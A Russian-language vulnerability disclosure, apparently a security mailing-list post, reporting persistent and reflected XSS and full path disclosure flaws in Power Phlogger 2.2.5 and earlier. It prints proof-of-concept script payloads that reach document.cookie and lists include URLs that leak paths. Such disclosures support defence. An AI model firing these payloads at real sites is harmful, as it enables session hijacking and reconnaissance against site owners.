|
Здравствуйте 3APA3A!
Сообщаю вам о найденных мною новых Cross-Site Scripting и Full path disclosure уязвимостях в Power Phlogger.
XSS (Persistent):
На странице http://site/dspStats.php?edit=mp в логах посещений не фильтруется информация о страницах сайта. Если счётчик установлен на 404 странице (или на индексной), то для атаки нужно указать код в качестве адреса страницы сайта.
http:/site/<script>alert(document.cookie)</script>
XSS:
http://site/dspStats.
php?edit=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
Full path disclosure:
http://site/include/edCss.inc.php
http://site/include/foot.inc.php
http://site/include/get_csscolors.inc.php
http://site/include/head.inc.php
http://site/include/head_stuff.inc.php
http://site/include/loglist.inc.php
http://site/include/pphlogger_send.inc.php
Уязвима версия Power Phlogger 2.2.5 и предыдущие версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1845/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
|
